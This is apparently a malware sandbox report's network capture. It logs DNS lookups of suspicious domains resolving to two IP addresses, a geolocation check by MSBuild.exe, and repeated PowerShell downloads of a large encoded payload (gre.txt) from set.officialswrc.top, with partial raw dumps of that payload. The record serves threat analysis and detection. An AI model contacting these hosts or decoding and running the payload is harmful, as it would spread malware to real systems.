Dec 19, 2024 13:19:31.051764011 CET | 53 | 58748 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 13:19:34.573563099 CET | 64564 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 13:19:34.895673037 CET | 53 | 64564 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 13:19:37.401786089 CET | 59083 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 13:19:37.539182901 CET | 53 | 59083 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 13:20:09.877115965 CET | 54294 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 13:20:10.418816090 CET | 53 | 54294 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 13:20:11.630475044 CET | 54722 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 13:20:12.055710077 CET | 53 | 54722 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 13:20:13.270828009 CET | 60996 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 13:20:13.799448967 CET | 53 | 60996 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 13:19:07.254606962 CET | 192.168.2.4 | 1.1.1.1 | 0xe7a3 | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:30.537457943 CET | 192.168.2.4 | 1.1.1.1 | 0xd641 | Standard query (0) | set.officialswrc.top | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:34.573563099 CET | 192.168.2.4 | 1.1.1.1 | 0xcf69 | Standard query (0) | rem.pushswroller.eu | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:37.401786089 CET | 192.168.2.4 | 1.1.1.1 | 0xe542 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:20:09.877115965 CET | 192.168.2.4 | 1.1.1.1 | 0x9b2c | Standard query (0) | firewarzone.ydns.eu | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:20:11.630475044 CET | 192.168.2.4 | 1.1.1.1 | 0xc7e | Standard query (0) | dim.remofficialws.top | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:20:13.270828009 CET | 192.168.2.4 | 1.1.1.1 | 0x156f | Standard query (0) | rem.officialswvrem.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 13:19:07.393280983 CET | 1.1.1.1 | 192.168.2.4 | 0xe7a3 | No error (0) | res.cloudinary.com | resc.cloudinary.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 13:19:22.475964069 CET | 1.1.1.1 | 192.168.2.4 | 0xb933 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:22.475964069 CET | 1.1.1.1 | 192.168.2.4 | 0xb933 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:26.423935890 CET | 1.1.1.1 | 192.168.2.4 | 0xb40d | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 13:19:26.423935890 CET | 1.1.1.1 | 192.168.2.4 | 0xb40d | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:31.051764011 CET | 1.1.1.1 | 192.168.2.4 | 0xd641 | No error (0) | set.officialswrc.top | | 5.182.211.158 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:34.895673037 CET | 1.1.1.1 | 192.168.2.4 | 0xcf69 | No error (0) | rem.pushswroller.eu | | 45.80.158.30 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:37.539182901 CET | 1.1.1.1 | 192.168.2.4 | 0xe542 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:19:59.181997061 CET | 1.1.1.1 | 192.168.2.4 | 0x3aaf | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 13:19:59.181997061 CET | 1.1.1.1 | 192.168.2.4 | 0x3aaf | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:20:10.418816090 CET | 1.1.1.1 | 192.168.2.4 | 0x9b2c | No error (0) | firewarzone.ydns.eu | | 45.80.158.30 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:20:12.055710077 CET | 1.1.1.1 | 192.168.2.4 | 0xc7e | No error (0) | dim.remofficialws.top | | 45.80.158.30 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:20:13.799448967 CET | 1.1.1.1 | 192.168.2.4 | 0x156f | No error (0) | rem.officialswvrem.top | | 45.80.158.30 | A (IP address) | IN (0x0001) | false
• set.officialswrc.top
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | 8048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 13:19:37.663444042 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 19, 2024 13:19:38.920955896 CET | 1171 | IN | HTTP/1.1 200 OK
date: Thu, 19 Dec 2024 12:19:38 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 5.182.211.158 | 443 | 7320 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 12:19:32 UTC | 81 | OUT | GET /ink/gre.txt HTTP/1.1
Host: set.officialswrc.top
Connection: Keep-Alive
2024-12-19 12:19:33 UTC | 424 | IN | HTTP/1.1 200 OK
etag: "a0800-676328f6-13f694;;;"
last-modified: Wed, 18 Dec 2024 19:56:38 GMT
content-type: text/plain
content-length: 657408
accept-ranges: bytes
date: Thu, 19 Dec 2024 12:19:32 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nD
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 30 59 4d 4e 42 54 54 74 30 41 4c 4e 6b 53 7a 6e 30 4d 4a 4e 37 51 6a 44 7a 30 2f 4d 32 50 44 30 7a 51 38 4d 36 4f 6a 72 7a 67 36 4d 61 4e 54 4e 79 38 76 4d 62 4c 7a 76 79 4d 55 4d 61 48 6a 49 41 41 41 41 59 43 51 41 41 41 77 50 4f 2b 44 61 2f 41 6b 50 72 37 6a 35 2b 45 4a 50 37 79 44 6f 38 73 4a 50 56 79 54 68 38 30 46 50 49 77 7a 41 37 6f 54 4f 35 68 7a 73 34 4d 35 4e 64 66 6a 30 31 55 65 4e 6f 53 6a 65 30 55 57 4d 6f 48 6a 76 41 41 41 41 38 41 41 41 77 44 41 41 41 6b 6a 72 35 41 5a 4f 6e 68 7a 79 34 30 4b 4f 65 65 44 49 33 4d 67 4e 32 62 7a 35 32 4d 73 4e 39 61 7a 6a 32 51 6e 4e 57 5a 44 54 32 55 51 4e 70 58 7a 33 31 55 58 4e 6d 56 54 59 31 77 56 4e 62 55 6a 46 30 4d 4c 4e 59 4d 7a 31 7a 41 38 4d 42 4f 7a 63 7a 30 32 4d 54 4d 6a 44 79 38 76 4d 38 4a 44
                                                                                              Data Ascii: 0YMNBTTt0ALNkSzn0MJN7QjDz0/M2PD0zQ8M6Ojrzg6MaNTNy8vMbLzvyMUMaHjIAAAAYCQAAAwPO+Da/AkPr7j5+EJP7yDo8sJPVyTh80FPIwzA7oTO5hzs4M5Ndfj01UeNoSje0UWMoHjvAAAA8AAAwDAAAkjr5AZOnhzy40KOeeDI3MgN2bz52MsN9azj2QnNWZDT2UQNpXz31UXNmVTY1wVNbUjF0MLNYMz1zA8MBOzcz02MTMjDy8vM8JD
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 41 41 41 41 41 41 41 41 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 2f 42 36 58 4d 41 41 51 2b 67 37 4e 32 54 48 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 6a 32 71 70 39 58 41 41 69 32 65 70 64 55 41 41 51 42 52 42 41 41 41 41 67 2f 68 36 48
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAgACIgACIgACIgACIgACIgACIgACIgACIgACAAAAAAAAEQABEQABEQABEQABEQABEQABEQABEQABEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg/B6XMAAQ+g7N2THIAAAAAAAAAAAAAAAAAAAAAAIj2qp9XAAi2epdUAAQBRBAAAAg/h6H
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 6b 30 55 41 41 41 41 45 41 41 47 4a 4e 42 41 41 41 41 43 6b 78 6b 46 49 43 41 41 78 48 6f 2f 2f 66 2f 49 42 77 52 4d 77 45 41 41 41 41 41 41 59 55 30 51 44 41 41 41 45 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 77 2f 2f 2f 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 7a 4c 41 41 41 51 41 41 59 55 30 73 43 41 41 41 49 51 47 54 57 67 49 41 41 45 51 78 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 6a 48 41 41 41 51 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 46 4e
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAYk0UAAAAEAAGJNBAAAACkxkFICAAxHo//f/IBwRMwEAAAAAAYU0QDAAAEAAAAQAAAAAAAAAAAAAAAAA/////DAAAAw/////AAAAAAAAAAAAAAAAAAAAAAgRRzLAAAQAAYU0sCAAAIQGTWgIAAEQxCAAAAAAAAAAAAAAAAgRRjHAAAQAAAAABAAAAAAAAAAAAAAAA8////PAAAAA/////DAAAAAAAAAAAAAAAAAAAAAAGFN
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 31 41 54 4f 47 52 55 52 43 4a 44 4e 32 67 6a 51 7a 4d 7a 51 44 4e 6b 4e 78 67 44 4f 42 4e 45 52 44 4e 6a 4e 35 45 6b 52 47 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 42 44 52 35 41 54 4f 34 67 6a 4e 79 49 54 4e 78 51 6b 51 47 46 7a 4e 77 6b 44 52 31 59 55 4f 42 6c 54 52 31 55 55 4f 47 5a 6b 52 47 5a 30 4e 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 30 4e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: 1ATOGRURCJDN2gjQzMzQDNkNxgDOBNERDNjN5EkRGBDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBDR5ATO4gjNyITNxQkQGFzNwkDR1YUOBlTR1UUOGZkRGZ0NGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZ0NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 74 65 42 38 49 2b 6b 74 2b 47 65 63 64 66 53 75 2b 73 57 6d 59 6c 48 65 30 37 59 69 71 56 6e 77 49 54 6b 6a 4a 6e 57 4b 4a 42 65 49 54 6a 46 64 44 32 43 31 2b 6d 6c 32 56 4b 6c 65 72 2f 62 62 63 57 5a 46 53 2b 31 35 44 38 59 2b 47 76 32 30 58 4f 61 6a 47 42 76 45 42 79 55 64 43 4d 38 4c 41 48 65 58 2b 37 41 6d 46 70 2b 47 6e 56 69 75 61 6c 6b 33 78 4f 36 6a 31 4b 47 52 41 61 53 4e 4c 66 64 78 71 63 4e 2f 50 56 4f 54 6c 55 76 41 32 46 4a 69 4d 33 6d 39 74 61 6e 2b 56 42 43 4d 44 4d 35 53 6a 6a 31 71 73 71 66 52 78 2f 52 6e 72 74 38 4f 72 36 6c 6c 36 63 43 70 44 72 78 46 6c 4e 6c 66 42 64 4b 55 52 52 76 51 51 6a 37 56 30 68 45 62 63 42 58 31 79 59 62 59 37 74 4d 68 51 53 6d 56 42 7a 4a 32 30 53 75 33 49 77 77 73 78 6c 44 71 42 45 30 2f 4e 55 35 69 6f 77 54
                                                                                              Data Ascii: teB8I+kt+GecdfSu+sWmYlHe07YiqVnwITkjJnWKJBeITjFdD2C1+ml2VKler/bbcWZFS+15D8Y+Gv20XOajGBvEByUdCM8LAHeX+7AmFp+GnViualk3xO6j1KGRAaSNLfdxqcN/PVOTlUvA2FJiM3m9tan+VBCMDM5Sjj1qsqfRx/Rnrt8Or6ll6cCpDrxFlNlfBdKURRvQQj7V0hEbcBX1yYbY7tMhQSmVBzJ20Su3IwwsxlDqBE0/NU5iowT
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 38 49 49 51 71 6c 72 37 72 6d 77 50 78 72 46 6d 49 58 71 6a 52 78 37 6b 76 38 72 6d 78 62 6a 6e 2f 45 76 51 61 36 61 71 74 41 4f 76 52 56 4c 46 7a 79 57 70 48 2f 54 38 71 30 4c 77 73 46 44 7a 38 61 5a 78 51 6b 44 52 62 6d 7a 50 78 50 52 41 51 4c 78 57 52 78 37 61 62 32 4f 78 4f 31 37 65 2f 41 2f 2b 6d 39 71 2f 54 76 42 50 41 70 7a 46 6e 55 38 65 53 39 44 38 6a 7a 75 4d 54 48 74 6f 38 41 70 48 63 62 68 34 50 46 33 50 77 7a 73 6b 72 49 33 52 33 7a 44 6d 6d 36 69 53 63 48 6d 43 2f 41 66 74 59 78 57 2b 4a 2b 41 50 52 69 45 65 59 45 54 59 31 38 44 38 65 36 6a 79 47 50 2f 67 38 45 6d 68 2b 75 6b 73 45 2b 2f 50 77 66 59 52 59 55 33 6d 49 7a 4c 6a 52 2b 74 34 78 79 6a 4a 2f 41 50 63 72 6c 53 33 32 37 4e 50 4e 4f 6e 34 6b 57 48 74 6c 39 44 38 5a 42 37 30 56 55 49
                                                                                              Data Ascii: 8IIQqlr7rmwPxrFmIXqjRx7kv8rmxbjn/EvQa6aqtAOvRVLFzyWpH/T8q0LwsFDz8aZxQkDRbmzPxPRAQLxWRx7ab2OxO17e/A/+m9q/TvBPApzFnU8eS9D8jzuMTHto8ApHcbh4PF3PwzskrI3R3zDmm6iScHmC/AftYxW+J+APRiEeYETY18D8e6jyGP/g8Emh+uksE+/PwfYRYU3mIzLjR+t4xyjJ/APcrlS327NPNOn4kWHtl9D8ZB70VUI
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 2f 63 2b 5a 41 44 41 41 41 41 77 50 6e 72 49 51 41 41 41 41 41 38 7a 35 74 43 45 41 41 41 41 41 2f 63 4f 30 41 42 41 41 41 41 77 50 6e 54 50 41 41 41 41 41 41 38 44 36 59 41 41 41 41 41 41 41 2f 67 4f 50 41 43 41 41 41 41 77 50 6f 48 47 67 41 41 41 41 41 38 44 36 48 43 41 41 41 41 41 41 2f 67 4f 72 41 44 41 41 41 41 77 50 6f 50 4e 41 41 41 41 41 41 38 44 36 35 44 4d 41 41 41 41 41 2f 6b 65 49 41 41 41 41 41 41 77 50 70 6a 45 77 41 41 41 41 41 38 54 36 78 42 41 41 41 41 41 41 2f 6b 65 6d 41 43 41 41 41 41 77 50 70 4c 4d 77 41 41 41 41 41 38 54 36 73 44 49 41 41 41 41 41 2f 6f 75 46 41 44 41 41 41 41 77 50 71 48 45 77 41 41 41 41 41 38 6a 36 74 42 41 41 41 41 41 41 2f 6f 65 6d 41 41 41 41 41 41 77 50 71 58 4d 67 41 41 41 41 41 38 6a 36 79 44 49 41 41 41 41
                                                                                              Data Ascii: /c+ZADAAAAwPnrIQAAAAA8z5tCEAAAAA/cO0ABAAAAwPnTPAAAAAA8D6YAAAAAAA/gOPACAAAAwPoHGgAAAAA8D6HCAAAAAA/gOrADAAAAwPoPNAAAAAA8D65DMAAAAA/keIAAAAAAwPpjEwAAAAA8T6xBAAAAAA/kemACAAAAwPpLMwAAAAA8T6sDIAAAAA/ouFADAAAAwPqHEwAAAAA8j6tBAAAAAA/oemAAAAAAwPqXMgAAAAA8j6yDIAAAA
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 67 45 41 44 42 51 52 59 44 4e 41 41 41 51 53 41 67 45 41 61 42 51 52 59 6a 4d 41 41 41 41 53 41 67 45 41 61 42 51 52 59 44 4d 41 41 41 77 51 41 34 45 41 46 42 51 52 59 7a 4b 41 41 41 67 51 41 77 45 41 4f 42 51 52 59 7a 4a 41 41 41 51 51 41 34 45 41 46 42 51 52 59 54 49 41 41 41 51 56 41 34 45 41 46 42 51 52 59 44 47 41 41 41 51 56 41 34 45 41 46 42 51 52 59 7a 44 41 41 41 51 56 41 34 45 41 46 42 51 52 59 6a 43 41 41 41 41 41 41 41 41 41 7a 42 51 5a 41 51 48 41 68 42 41 64 41 4d 48 41 74 41 41 5a 41 55 47 41 30 42 51 61 41 34 47 41 31 42 41 41 41 41 41 41 74 42 77 62 41 51 47 41 6e 42 67 62 41 6b 47 41 72 42 51 4c 41 51 47 41 6c 42 41 64 41 6b 47 41 75 42 51 64 41 41 41 41 76 42 77 5a 41 45 47 41 69 42 77 62 41 51 48 41 67 41 67 4a 41 41 43 41 6b 42 51
                                                                                              Data Ascii: AgEADBQRYDNAAAQSAgEAaBQRYjMAAAASAgEAaBQRYDMAAAwQA4EAFBQRYzKAAAgQAwEAOBQRYzJAAAQQA4EAFBQRYTIAAAQVA4EAFBQRYDGAAAQVA4EAFBQRYzDAAAQVA4EAFBQRYjCAAAAAAAAAzBQZAQHAhBAdAMHAtAAZAUGA0BQaA4GA1BAAAAAAtBwbAQGAnBgbAkGArBQLAQGAlBAdAkGAuBQdAAAAvBwZAEGAiBwbAQHAgAgJAACAkBQ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49755 | 5.182.211.158 | 443 | 7908 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 12:20:06 UTC | 81 | OUT | GET /ink/gre.txt HTTP/1.1
Host: set.officialswrc.top
Connection: Keep-Alive
2024-12-19 12:20:07 UTC | 424 | IN | HTTP/1.1 200 OK
etag: "a0800-676328f6-13f694;;;"
last-modified: Wed, 18 Dec 2024 19:56:38 GMT
content-type: text/plain
content-length: 657408
accept-ranges: bytes
date: Thu, 19 Dec 2024 12:20:06 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nD
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 30 59 4d 4e 42 54 54 74 30 41 4c 4e 6b 53 7a 6e 30 4d 4a 4e 37 51 6a 44 7a 30 2f 4d 32 50 44 30 7a 51 38 4d 36 4f 6a 72 7a 67 36 4d 61 4e 54 4e 79 38 76 4d 62 4c 7a 76 79 4d 55 4d 61 48 6a 49 41 41 41 41 59 43 51 41 41 41 77 50 4f 2b 44 61 2f 41 6b 50 72 37 6a 35 2b 45 4a 50 37 79 44 6f 38 73 4a 50 56 79 54 68 38 30 46 50 49 77 7a 41 37 6f 54 4f 35 68 7a 73 34 4d 35 4e 64 66 6a 30 31 55 65 4e 6f 53 6a 65 30 55 57 4d 6f 48 6a 76 41 41 41 41 38 41 41 41 77 44 41 41 41 6b 6a 72 35 41 5a 4f 6e 68 7a 79 34 30 4b 4f 65 65 44 49 33 4d 67 4e 32 62 7a 35 32 4d 73 4e 39 61 7a 6a 32 51 6e 4e 57 5a 44 54 32 55 51 4e 70 58 7a 33 31 55 58 4e 6d 56 54 59 31 77 56 4e 62 55 6a 46 30 4d 4c 4e 59 4d 7a 31 7a 41 38 4d 42 4f 7a 63 7a 30 32 4d 